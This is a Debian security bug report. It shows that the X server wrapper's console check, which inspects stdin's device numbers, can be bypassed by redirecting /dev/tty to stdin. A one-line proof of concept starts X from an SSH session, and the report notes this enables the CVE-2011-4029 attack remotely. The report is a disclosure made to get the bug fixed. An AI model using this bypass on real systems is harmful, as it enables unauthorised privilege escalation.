Bug#652249: bypass default security level of the X wrapper
Package: xserver-xorg
Version: 1:7.5+8
Severity: important
Tags: security
By default, the wrapper's configuration file only allows users who are on the
console (i.e. whose standard input is a virtual console TTY) to start the X
server with root privileges:
# cat /etc/X11/Xwrapper.config
[...]
allowed_users=console
To determine whether a user is on the console, the code checks the
properties of the file connected to its standard input:
$ cat -n debian/local/xserver-wrapper.c
[...]
152 static int
153 onConsole()
154 {
155 #if defined(__linux__)
156 struct stat s;
157
158 /* see if stdin is a virtual console device */
159 if (fstat(0, &s) != 0) {
160 (void) fprintf(stderr, "X: cannot stat stdin\n");
161 return FALSE;
162 }
163 if (S_ISCHR(s.st_mode) &&
164 ((((s.st_rdev >> 8) & 0xff) == TTY_MAJOR_DEV &&
165 (s.st_rdev & 0xff) < 64) ||
166 (((s.st_rdev >> 8) & 0xff) == ALT_TTY_MAJOR_DEV &&
167 (s.st_rdev & 0xff) < 64)
168 )) {
169 return TRUE;
170 }
As shown, this is done by checking that this file:
- is a character device [line 163]
- has a TTY major number (TTY_MAJOR_DEV or ALT_TTY_MAJOR_DEV, i.e. 4 or 5
respectively) [lines 164, 166]
- has a minor number lower than 64 [lines 165, 167]
Unfortunately, by connecting a file with the same properties to its stdin, a
user can mislead the X wrapper into launching the X server. The only further
requirement is that the file be readable by the user.
For instance, "/dev/tty" and "/dev/ptmx" both match those conditions
(world-readable character devices on major 5 with a minor number below 64):
$ ls -l /dev/tty /dev/ptmx
crw-rw-rw- 1 root root 5, 2 14 Dec. 18:43 /dev/ptmx
crw-rw-rw- 1 root root 5, 0 12 Dec. 23:03 /dev/tty
Here is a quick PoC by using "/dev/tty":
$ ssh remote_host
$ id
uid=1000(vladz) gid=1000(vladz) groups=1000(vladz)
$ tty
/dev/pts/4 // a pseudo-terminal, not a virtual console: not allowed to start X
$ X :1
X: user not authorized to run the X server, aborting.
// This was the expected result; now let's connect "/dev/tty" to stdin and
// retry...
$ exec 0</dev/tty; X :1; exec 0</dev/pts/4
[... Xorg starts ...] // the start succeeded!
That said, this is a minor issue on its own, but the attack against
CVE-2011-4029[1], which allows setting the read permission on any arbitrary
file, can now be launched from remote sessions, without even being on a TTY.
It has become urgent to fix it.
[1] http://security-tracker.debian.org/tracker/CVE-2011-4029
Thanks,
vladz.
--
http://vladz.devzero.fr
PGP key 8F7E2D3C from pgp.mit.edu